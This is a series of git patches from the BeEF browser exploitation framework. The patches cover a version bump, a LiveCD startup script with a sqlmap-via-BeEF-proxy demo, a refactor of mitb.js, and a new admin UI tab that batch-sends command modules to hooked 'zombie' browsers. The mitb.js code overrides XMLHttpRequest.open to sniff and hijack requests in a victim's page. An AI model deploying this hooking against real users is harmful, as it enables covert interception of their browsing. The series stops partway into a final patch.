 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index ded06bdff..8a77ec1e3 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.3.9-alpha
+0.4.4.1-alpha
diff --git a/config.yaml b/config.yaml
index 54d90ada0..a1f025663 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.9-alpha'
+    version: '0.4.4.1-alpha'
     debug: false
 
     restrictions:

From 0580b867440f0552c48b53115b55356072d21d9b Mon Sep 17 00:00:00 2001
From: ben-waugh <ben@delonge.com.au>
Date: Sun, 30 Dec 2012 16:23:50 +1000
Subject: [PATCH 126/397] Move liveCD Script to a new folder #781

---
 BeEFLive.sh        | 112 +--------------------------------------------
 liveCD/BeEFLive.sh | 110 ++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 112 insertions(+), 110 deletions(-)
 create mode 100644 liveCD/BeEFLive.sh

diff --git a/BeEFLive.sh b/BeEFLive.sh
index 45c00c2c9..10b06769e 100644
--- a/BeEFLive.sh
+++ b/BeEFLive.sh
@@ -1,110 +1,2 @@
-#!/bin/bash
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'home/beef/doc/COPYING' for copying permission
-#
-
-   
-#
-# This is the auto startup script for the BeEF Live CD. 
-# IT SHOULD ONLY BE RUN ON THE LIVE CD
-# Download LiveCD here: https://github.com/beefproject/beef/downloads
-#
-# This script contains a few fixes to make BeEF play nicely with the way  
-# remastersys creates the live cd distributable as well as generating host keys 
-# to enable SSH etc. The script also make it easy for the user to update/start 
-# the BeEF server
-#
-clear
-echo "======================================"
-echo "          BeEF Live CD   "
-echo "======================================"
-echo ""
-echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
-echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
-echo "See the file 'home/beef/doc/COPYING' for copying permission"
-echo ""
-
-echo "Welcome to the BeEF Live CD" 
-echo "" 
-echo ""
-
-#
-# Check for SSH Host Keys - if they do not exist ask user if they should be 
-# created (remastersys has a habit of deleting them during Live CD Creation)
-#
-f1="/etc/ssh/ssh_host_rsa_key"
-if [ -f $f1 ]
-then
-	echo ""
-else 
-	echo -n "Would you like to enable ssh (y/N)? "
-	read var
-	
-	if [ $var = "y" ] ; then
-		 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
-		 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
-		 echo ""
-		 echo "Please provide a password for ssh user: beef"
-		 sudo passwd beef
-		 echo "ssh enabled"
-	fi
-fi
-echo ""
-
-#
-# Prompt the user if they would like to update BeEF and 
-# other components installed (such as sqlmap and msf)
-#
-echo -n "Check and install updates for BeEF (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
-	 cd /opt/beef
-	 git stash
-	 git pull
-fi
-echo ""
-
-echo -n "Check and install updates for msf and sqlmap (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
- 	 cd /opt/sqlmap
- 	 git stash
-	 git pull
-	 cd /opt/metasploit-framework
-	 git stash
-	 git pull
-fi
- 
- 
-#
-# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
-# (if they do not yet exist)
-#
-f1="beef"
-if [ -f $f1 ] ; then
-	echo ""
-else
-	ln -s /opt/beef/ beef
-	ln -s /opt/metasploit-framework/ msf
-	ln -s /opt/sqlmap/ sqlmap
-fi
-
-#
-# Prompt the user if they would like start BeEF
-#
-echo -n "Start BeEF (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
-	echo ""
-	echo "Starting BeEF..";
-	
-	cd /opt/beef
-	ruby beef -x
-fi
-
-
+# Reference for old (<1.2) versions of BeEF Live
+bash /opt/beef/liveCD/BeEFLive.sh
diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh
new file mode 100644
index 000000000..14fedd039
--- /dev/null
+++ b/liveCD/BeEFLive.sh
@@ -0,0 +1,110 @@
+#!/bin/bash
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'home/beef/doc/COPYING' for copying permission
+#
+
+   
+#
+# This is the auto startup script for the BeEF Live CD. 
+# IT SHOULD ONLY BE RUN ON THE LIVE CD
+# Download LiveCD here: https://github.com/beefproject/beef/downloads
+#
+# This script contains a few fixes to make BeEF play nicely with the way  
+# remastersys creates the live cd distributable as well as generating host keys 
+# to enable SSH etc. The script also make it easy for the user to update/start 
+# the BeEF server
+#
+clear
+echo "======================================"
+echo "          BeEF Live CD   "
+echo "======================================"
+echo ""
+echo "Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net"
+echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
+echo "See the file 'home/beef/doc/COPYING' for copying permission"
+echo ""
+
+echo "Welcome to the BeEF Live CD" 
+echo "" 
+echo ""
+
+#
+# Check for SSH Host Keys - if they do not exist ask user if they should be 
+# created (remastersys has a habit of deleting them during Live CD Creation)
+#
+f1="/etc/ssh/ssh_host_rsa_key"
+if [ -f $f1 ]
+then
+	echo ""
+else 
+	echo -n "Would you like to enable ssh (y/N)? "
+	read var
+	
+	if [ $var = "y" ] ; then
+		 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
+		 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
+		 echo ""
+		 echo "Please provide a password for ssh user: beef"
+		 sudo passwd beef
+		 echo "ssh enabled"
+	fi
+fi
+echo ""
+
+#
+# Prompt the user if they would like to update BeEF and 
+# other components installed (such as sqlmap and msf)
+#
+echo -n "Check and install updates for BeEF (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+	 cd /opt/beef
+	 git stash
+	 git pull
+fi
+echo ""
+
+echo -n "Check and install updates for msf and sqlmap (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+ 	 cd /opt/sqlmap
+ 	 git stash
+	 git pull
+	 cd /opt/metasploit-framework
+	 git stash
+	 git pull
+fi
+ 
+ 
+#
+# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
+# (if they do not yet exist)
+#
+f1="beef"
+if [ -f $f1 ] ; then
+	echo ""
+else
+	ln -s /opt/beef/ beef
+	ln -s /opt/metasploit-framework/ msf
+	ln -s /opt/sqlmap/ sqlmap
+fi
+
+#
+# Prompt the user if they would like start BeEF
+#
+echo -n "Start BeEF (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+	echo ""
+	echo "Starting BeEF..";
+	
+	cd /opt/beef
+	ruby beef -x
+fi
+
+

From 0244980db0e1c7b88570e650a89fcc91ef74c2b4 Mon Sep 17 00:00:00 2001
From: ben-waugh <ben@delonge.com.au>
Date: Sun, 30 Dec 2012 17:34:06 +1000
Subject: [PATCH 127/397] LiveCD - Added proxy demo for sqlmap #789

---
 liveCD/BeEFLive.sh | 32 +++++++++++++++++++++++++++++---
 1 file changed, 29 insertions(+), 3 deletions(-)

diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh
index 14fedd039..c8a74ed0c 100644
--- a/liveCD/BeEFLive.sh
+++ b/liveCD/BeEFLive.sh
@@ -99,12 +99,38 @@ fi
 echo -n "Start BeEF (y/N)? "
 read var
 
-if [ $var = "y" ] ; then
-	echo ""
+#
+# function to allow beef to run in the background
+#
+run_beef() {
+    echo ""
 	echo "Starting BeEF..";
 	
-	cd /opt/beef
+	cd /opt/beef/
 	ruby beef -x
+}
+
+if [ $var = "y" ] ; then
+	run_beef &
+	sleep 5
+fi
+
+#
+# Prompt the user if they would like start sqlmap using beef as proxy
+#
+
+echo ""
+echo -n "Start sqlMAP with BeEF Proxy? (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+	echo ""
+	echo "sqlMAP can now be run using the --proxy command set to the BeEF Proxy: http://127.0.0.1:6789 starting the wizard to demo with:"
+	echo "python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard"
+	sleep 5
+	python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard
 fi
 
 
+
+

From d976e86cbec740a8af2cf9ad95706d1d1cbd3837 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 30 Dec 2012 13:13:10 +0100
Subject: [PATCH 128/397] Refactored mitm.js AJAX sniffing feature. Fixed a
 couple of other bugs in mitb.js

---
 core/main/client/mitb.js             | 67 +++++++++-------------------
 core/main/handlers/modules/beefjs.rb |  3 ++
 2 files changed, 25 insertions(+), 45 deletions(-)

diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js
index 05b104af0..9ed626b74 100644
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -15,46 +15,30 @@ beef.mitb = {
         beef.mitb.curl = curl;
         /*Override open method to intercept ajax request*/
         var xml_type;
+        var hook_file = "<%= @hook_file %>";
 
         if (window.XMLHttpRequest && !(window.ActiveXObject)) {
 
-            xml_type = 'XMLHttpRequest';
-        }
-
-        if (xml_type == "XMLHttpRequest") {
             beef.mitb.sniff("Method XMLHttpRequest.open override");
             (function (open) {
-                XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
-
-                    var portRegex = new RegExp(":[0-9]+");
-                    var portR = portRegex.exec(url);
-                    /*return :port*/
-                    var requestPort;
-
-                    if (portR != null) {
-                        requestPort = portR[0].split(":");
-                    }
-
-                    if ((user == "beef") && (pass == "beef")) {
-                        /*a poisoned something*/
-                        open.call(this, method, url, async, null, null);
-                    }
-
-
-                    else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
-                        /*a beef hook.js polling or dh */
-                        open.call(this, method, url, async, null, null);
-                    }
-
-                    else {
+                XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
+                    // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
+                    // or a request initiated by the MiTB itself.
+                    if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
+                        open.call(this, method, url, async, true);
+                    }else {
+                        var portRegex = new RegExp(":[0-9]+");
+                        var portR = portRegex.exec(url);
+                        var requestPort;
+                        if (portR != null) { requestPort = portR[0].split(":")[1]; }
 
+                        //GET request
                         if (method == "GET") {
+                            //GET request -> cross-domain
                             if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
                                 beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
                                 window.open(url);
-
-                            }
-                            else {
+                            }else { //GET request -> same-domain
                                 beef.mitb.sniff("GET [Ajax Request]: " + url);
                                 if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
                                     var title = "";
@@ -63,26 +47,19 @@ beef.mitb = {
                                     } else {
                                         title = document.getElementsByTagName("title")[0].innerHTML;
                                     }
-                                    /*write the url of the page*/
+                                    // write the url of the page
                                     history.pushState({ Be:"EF" }, title, url);
-
                                 }
-
                             }
-
-                        }
-                        else {
-                            /*if we are here we have an ajax post req*/
-                            beef.mitb.sniff("Post ajax request to: " + url);
-                            open.call(this, method, url, async, user, pass);
-
+                        }else{
+                            //POST request
+                            beef.mitb.sniff("POST ajax request to: " + url);
+                            open.call(this, method, url, async, true);
                         }
                     }
                 };
             })(XMLHttpRequest.prototype.open);
-
         }
-
     },
 
     // Initializes the hook on anchors and forms.
@@ -161,7 +138,7 @@ beef.mitb = {
     fetchForm:function (url, query, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('POST', url, false, "beef", "beef");
+            y.open('POST', url, false, true);
             y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
@@ -181,7 +158,7 @@ beef.mitb = {
     fetch:function (url, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
 
@@ -204,7 +181,7 @@ beef.mitb = {
         try {
             var target = document.getElementsByTagName("html")[0];
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
                     var title = "";
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 12ce8304e..e0338d660 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -74,6 +74,9 @@ module BeEF
             # @note set the XHR-polling timeout
             hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
 
+            # @note set the hook file path
+            hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+
             # @note if http_port <> public_port in config ini, use the public_port
             unless hook_session_config['beef_public_port'].nil?
               if hook_session_config['beef_port'] != hook_session_config['beef_public_port']

From f39b16712acb1dc78869b2f31a90709a42d43857 Mon Sep 17 00:00:00 2001
From: qswain2 <qswain2@washcoll.edu>
Date: Fri, 16 Nov 2012 20:49:33 -0500
Subject: [PATCH 129/397] Added auto-run tab

Added a new tab in the ui for the auto-run.
and allows modules to be selected with a
checkboxes.Added a handler to hide autorun
tab. Added stubs to ARE.
---
 core/main/client/are.js                       |  35 +-
 .../admin_ui/controllers/panel/index.html     |   3 +-
 .../media/javascript/ui/panel/ZombieTab.js    |  14 +-
 .../ui/panel/tabs/ZombieTabAutorun.js         | 361 ++++++++++++++++++
 4 files changed, 404 insertions(+), 9 deletions(-)
 create mode 100644 extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js

diff --git a/core/main/client/are.js b/core/main/client/are.js
index e7d781f64..fce1728cc 100644
--- a/core/main/client/are.js
+++ b/core/main/client/are.js
@@ -9,8 +9,39 @@ beef.are = {
    var Jools = require('jools');
    this.ruleEngine = new Jools();
   },
-  rules:[],
+  send:function(module){
+    // there will probably be some other stuff here before things are finished
+    this.commands.push(module);
+  },
+  execute:function(inputs){
+    this.rulesEngine.execute(input);
+  },
+  cache_modules:function(modules){},
+  rules:[
+    {
+      'name':"exec_no_input",
+      'condition':function(command,browser){
+          //need to figure out how to handle the inputs
+          return (!command['inputs'] || command['inputs'].length == 0)
+       },
+      'consequence':function(command,browser){}
+    },
+    {
+      'name':"module_has_sibling",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    },
+    {
+      'name':"module_depends_on_module",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    }
+  ],
   commands:[],
   results:[]
 };
-beef.regCmp("beef.are");
\ No newline at end of file
+beef.regCmp("beef.are");
diff --git a/extensions/admin_ui/controllers/panel/index.html b/extensions/admin_ui/controllers/panel/index.html
index dcbed16a4..a104a41e8 100644
--- a/extensions/admin_ui/controllers/panel/index.html
+++ b/extensions/admin_ui/controllers/panel/index.html
@@ -37,7 +37,7 @@
     <%= stylesheet_tag 'wterm.css' %>
     <script type="text/javascript" language="JavaScript">var $jwterm = jQuery.noConflict();</script>
     <%= script_tag 'ui/panel/tabs/ZombieTabIpec.js' %>
-
+    <%= script_tag 'ui/panel/tabs/ZombieTabAutorun.js' %>
     <%= script_tag 'ui/panel/PanelViewer.js' %>
 	<%= script_tag 'ui/panel/DataGrid.js' %>
 	<%= script_tag 'ui/panel/MainPanel.js' %>
@@ -45,7 +45,6 @@
 	<%= script_tag 'ui/panel/ZombieTabs.js' %>
 	<%= script_tag 'ui/panel/zombiesTreeList.js' %>
 	<%= script_tag 'ui/panel/ZombiesMgr.js' %>
-	
 	<%= script_tag 'ui/panel/Logout.js' %>
 	<%= script_tag 'ui/panel/WelcomeTab.js' %>
 	<!-- <%= script_tag 'ui/panel/HackVertorTab.js' %> -->
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
index 238b59746..12917314c 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
@@ -5,16 +5,14 @@
 //
 
 ZombieTab = function(zombie) {
-	
 	main_tab = new ZombieTab_DetailsTab(zombie);
 	log_tab = new ZombieTab_LogTab(zombie);
 	commands_tab = new ZombieTab_Commands(zombie);
 	requester_tab = new ZombieTab_Requester(zombie);
     xssrays_tab =  new ZombieTab_XssRaysTab(zombie);
     ipec_tab = new ZombieTab_IpecTab(zombie);
-
-
-    ZombieTab.superclass.constructor.call(this, {
+    autorun_tab = new ZombieTab_Autorun(zombie);
+	ZombieTab.superclass.constructor.call(this, {
         id:"current-browser",
 		activeTab: 0,
 		loadMask: {msg:'Loading browser...'},
@@ -25,7 +23,13 @@ ZombieTab = function(zombie) {
 			forceFit: true,
 			type: 'fit'
 		},
-		items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab]
+		items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab, autorun_tab],
+        listeners:{
+            afterrender:function(component){
+                // Hide auto-run tab
+                component.hideTabStripItem(autorun_tab);
+            }
+        }
 	});
 };
 
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
new file mode 100644
index 000000000..f5e56c140
--- /dev/null
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
@@ -0,0 +1,361 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+/*
+ * The command tab panel. Listing the list of commands sent to the zombie.
+ * Loaded in /ui/panel/index.html
+ */
+function generate_form_input_field(form, input, value, disabled, zombie) {
+    var input_field = null;
+    var input_def = null;
+    if (!input['ui_label'])
+        input['ui_label'] = input['name'];
+
+    if (!input['type'])
+        input['type'] = 'textfield';
+
+    if (!input['value'])
+        input['value'] = '';
+
+    input_def = {
+        id: 'form-zombie-'+zombie.session+'-field-'+input['name'],
+        name: 'txt_'+input['name'],
+        fieldLabel: input['ui_label'],
+        anchor:'70%',
+        allowBlank: false,
+        value: input['value']
+    };
+
+        // create the input field object based upon the type supplied
+    switch(input['type'].toLowerCase()) {
+        case 'textfield':
+            input_field = new Ext.form.TextField(input_def);
+            break;
+        case 'textarea':
+            input_field = new Ext.form.TextArea(input_def);
+            break;
+        case 'hidden':
+            input_field = new Ext.form.Hidden(input_def);
+            break;
+        case 'label':
+            input_def['fieldLabel'] = ''
+            input_def['html'] = input['html'];
+            input_field = new Ext.form.Label(input_def);
+            break;
+        case 'checkbox':
+            input_def['name'] = 'chk_' + input['name'];
+            input_field = new Ext.form.Checkbox(input_def);
+            break;
+        case 'checkboxgroup':
+            input_def['name'] = 'chkg_' + input['name'];
+            input_def['items'] = input['items'];
+            input_field = new Ext.form.CheckboxGroup(input_def);
+            break;
+        case 'combobox':
+            input_def['name'] = 'com_' + input['name'];
+            input_def['triggerAction'] = 'all';
+
+            if(input.reloadOnChange || input.defaultPayload != null) {
+                // defined in msfcommand.rb
+                // initially the panel will be empty so it may appear still hidden
+                Ext.getCmp("payload-panel").show();
+                input_def['listeners'] = {
+                    // update the payload options when one of them is selected
+                    'select': function(combo, value) {
+                        get_dynamic_payload_details(combo.getValue(), zombie);
+                    },
+                    // set the default payload value as defined in defaultPayload
+                    'afterrender': function(combo){
+                        combo.setValue(input.defaultPayload);
+                        get_dynamic_payload_details(combo.getValue(),zombie);
+                    }
+                };
+            }
+
+            // create store to contain options for the combo box
+            input_def['store']  = new Ext.data.ArrayStore( {
+                fields: input['store_fields'],
+                data: input['store_data']
+            });
+
+            input_field = new Ext.form.ComboBox(input_def);
+            break;
+
+       default:
+            input_field = new Ext.form.TextField(input_def);
+            break;
+        }
+
+    // add the properties for the input element, for example: widths, default values and the html lables
+    for(definition in input) {
+        if( (typeof input[definition] == 'string') && (definition != 'type') && (definition != 'name')) {
+            input_field[definition] = input[definition];
+        }
+    }
+
+    if(value)
+         input_field.setValue(value);
+    if(disabled)
+        input_field.setDisabled(true);
+
+    form.add(input_field);
+};
+
+function get_rest_token(){
+    var token = "";
+    var url = "/ui/modules/getRestfulApiToken.json";
+    $jwterm.ajax({
+        contentType: 'application/json',
+        dataType: 'json',
+        type: 'GET',
+        url: url,
+        async: false,
+        processData: false,
+        success: function(data){
+            token = data.token;
+        },
+        error: function(){
+            console.log("Error getting RESTful API token");
+        }
+    });
+    return token;
+}
+
+function get_module_details(id,token){
+    var mod = null;
+    var url = "http://127.0.0.1:3000/api/modules/"+id+"?token="+token;
+    $jwterm.ajax({
+        contentType: 'application/json',
+        dataType: 'json',
+        type: 'GET',
+        url: url,
+        async:false,
+        processData: false,
+        success: function(data){
+            mod = data;
+        }
+    });
+    return mod;
+}
+
+function process_module_opts(mod){
+    var mod_json = {
+       'mod_id': mod['id'],
+       'mod_input':[]
+    };
+   var opts = mod['options'];
+   var label='ui_label';
+   var type = 'type';
+   var type_val;
+   var label_val
+   var value;
+   var type;
+   var key = value = label = type_val = "";
+   var input;
+
+   if(opts.length > 0){
+       for( var i=0;i<opts.length;i++){
+           input = {};
+           key = opts[i]['name'];
+           value = opts[i]['value'];
+           type_val = opts[i]['type']
+           label_val = opts[i][label];
+           input[key]=value;
+           input[label]=label_val;
+           input[type] = type_val;
+           mod_json['mod_input'].push(input);
+       }
+   return mod_json;
+   }
+}
+
+function send_modules(token,module_data){
+    //TODO: Fix hardcoded api url
+    var url = "http://127.0.0.1:3000/api/modules/multi_module"+"?token="+token;
+    var payload = Ext.encode(module_data);
+    $jwterm.ajax({
+        contentType: 'application/json',
+        data: payload,
+        dataType: 'json',
+        type: 'POST',
+        url: url,
+        async:false,
+        processData: false,
+        success: function(data){
+            var results = data;
+        }
+    });
+}
+
+    /* Creates the same tree as the command module list*/
+ZombieTab_Autorun = function(zombie) {
+
+    var token = get_rest_token();
+
+    var details_panel = new Ext.FormPanel({
+        id: "zombie-autorun_details"+zombie.session,
+        title: "Module Details",
+        region:'west',
+        border: true,
+        width: 250,
+        minSize: 250,
+        maxSize: 500,
+    });
+
+    var list_panel = new Ext.Panel({
+        id: "zombie-autorun-list"+zombie.session,
+        title: "Selected Modules",
+        region:'west',
+        border: true,
+        width: 190,
+        minSize: 190,
+        maxSize: 500,
+    });
+
+    var command_module_tree = new Ext.tree.TreePanel({
+        id: "zombie-autorun-modules"+zombie.session,
+        title: "Module Tree",
+        border: true,
+        region: 'west',
+        width: 190,
+        minSize: 190,
+        maxSize: 500, // if some command module names are even longer, adjust this value
+        useArrows: true,
+        autoScroll: true,
+        animate: true,
+        containerScroll: true,
+        rootVisible: false,
+        root: {nodeType: 'async'},
+        buttons:[new Ext.Button({
+            text:'Execute',
+            hidden:false,
+            handler:function(){
+                var tree = Ext.getCmp('zombie-autorun-modules'+zombie.session);
+                var sel_nodes = tree.getChecked();
+                if(sel_nodes.length > 0){
+                    sel_nodes.forEach(function(item){
+                        if(item.hasChildNodes())
+                            sel_nodes.remove(item)
+                    });
+
+                    var mods_to_send = {
+                        'hb':zombie.session,
+                        'modules':[]
+                    };
+
+                    Ext.each(sel_nodes,function(item){
+                        var id = item.id;
+                        var module = get_module_details(id,token);
+                        var mod_json = {
+                            'mod_id': id,
+                            'mod_input':[]
+                        };
+
+                        module = process_module_opts(module);
+                        mods_to_send['modules'].push(module);
+                    });
+                    send_modules(token,mods_to_send);
+                }
+                else {
+                }
+         }})],
+         loader: new Ext.tree.TreeLoader({
+                dataUrl: '/ui/modules/select/commandmodules/tree.json',
+                baseParams: {zombie_session: zombie.session},
+                createNode: function(attr) {
+                if(attr.checked == null){attr.checked = false;}
+                        return Ext.tree.TreeLoader.prototype.createNode.call(this, attr);
+            },
+            listeners:{
+                beforeload: function(treeloader, node, callback) {
+                // Show loading mask on body, to prevent the user interacting with the UI
+                    treeloader.treeLoadingMask = new Ext.LoadMask(Ext.getBody(),{msg:"Please wait, command tree is loading..."});
+                    treeloader.treeLoadingMask.show();
+                    return true;
+                },
+                load: function(treeloader, node, response) {
+                       // Hide loading mask after tree is fully loaded
+                       treeloader.treeLoadingMask.hide();
+                       //if(node.parentNode.isChecked())
+                         node.getUI().toggleCheck();
+                          return true;
+                 }
+            }
+        }),
+        listeners: {
+            'click': function(node) {
+                if(!node.hasChildNodes()){
+                    details_panel.removeAll();
+                    details_panel.doLayout();
+                    // needs to be a functions (get_module_opts)
+                    var id = node.id;
+                    var module = get_module_details(id,token);
+                    if(!module){
+                        Ext.beef.msg("Module is null");
+                    }
+
+                    var inputs = module['options'];
+                    Ext.each(inputs,function(item){
+                        generate_form_input_field(details_panel,item,item['value'],false,zombie);
+                    });
+
+                    details_panel.doLayout();
+               }
+            },
+            'afterrender' : function() {},
+            'selectionchange' : function() {},
+            'activate' : function() {},
+            'select' : function() {},
+            'keyup' : function() {},
+            'render' : function(c) { c.getEl().on('keyup', function() {});},
+            'checkchange':function(node,check){
+                if(check){
+                    // expand and select all nodes under a parent
+                    if(node.isExpandable())
+                        node.expand();
+                        node.cascade(function(n){
+                        if(!n.getUI().isChecked())
+                            n.getUI().toggleCheck();
+                    });
+                }
+                // Collapse and deselect all children under the parent
+                else{
+                    node.cascade(function(n){
+                    if(n.getUI().isChecked())
+                        n.getUI().toggleCheck();
+                    });
+                    node.collapse();
+                }
+
+            }
+        }
+    });
+
+    ZombieTab_Autorun.superclass.constructor.call(this, {
+        id: 'zombie-'+zombie.session+'-autorun-panel',
+        title:'Autorun',
+        layout: 'hbox',
+        hidden: true,
+        layoutConfig:{align:'stretch'},
+        region: 'center',
+        selModel:Ext.tree.MultiSelectionModel,
+        items:[command_module_tree,details_panel],
+    });
+}
+
+Ext.extend(ZombieTab_Autorun, Ext.Panel, {
+    listeners: {close: function(panel) {}}
+});
+

From 98da93fb12766d1ead9fb8d8c91ed08652faef51 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 2 Jan 2013 18:07:53 +0100
Subject: [PATCH 130/397] ARE: fixed hardcoded URLs

---
 .../media/javascript/ui/panel/tabs/ZombieTabAutorun.js       | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
index f5e56c140..83db3532f 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
@@ -135,7 +135,7 @@ function get_rest_token(){
 
 function get_module_details(id,token){
     var mod = null;
-    var url = "http://127.0.0.1:3000/api/modules/"+id+"?token="+token;
+    var url = "/api/modules/"+id+"?token="+token;
     $jwterm.ajax({
         contentType: 'application/json',
         dataType: 'json',
@@ -182,8 +182,7 @@ function process_module_opts(mod){
 }
 
 function send_modules(token,module_data){
-    //TODO: Fix hardcoded api url
-    var url = "http://127.0.0.1:3000/api/modules/multi_module"+"?token="+token;
+    var url = "/api/modules/multi_module"+"?token="+token;
     var payload = Ext.encode(module_data);
     $jwterm.ajax({
         contentType: 'application/json',

From 8947d78d66b5ea27245d883959b576be971025aa Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 2 Jan 2013 18:30:06 +0100
Subject: [PATCH 131/397] ARE: added mod_id to the multi_module API call. The
 bug was preventing correct module calling.

---
 .../media/javascript/ui/panel/tabs/ZombieTabAutorun.js         | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
index 83db3532f..c083d07b0 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
@@ -147,6 +147,8 @@ function get_module_details(id,token){
             mod = data;
         }
     });
+    //add module id which is not returned by the RESTful API
+    mod['id'] = id;
     return mod;
 }
 
@@ -155,6 +157,7 @@ function process_module_opts(mod){
        'mod_id': mod['id'],
        'mod_input':[]
     };
+    console.log("mod_id: " + mod['id']);
    var opts = mod['options'];
    var label='ui_label';
    var type = 'type';

From 276d465dd108a249cef26f25232192527accf8fe Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 2 Jan 2013 18:31:23 +0100
Subject: [PATCH 132/397] ARE:  properly closed a couple of statements.

---
 .../media/javascript/ui/panel/tabs/ZombieTabAutorun.js     | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
index c083d07b0..8564c27f5 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
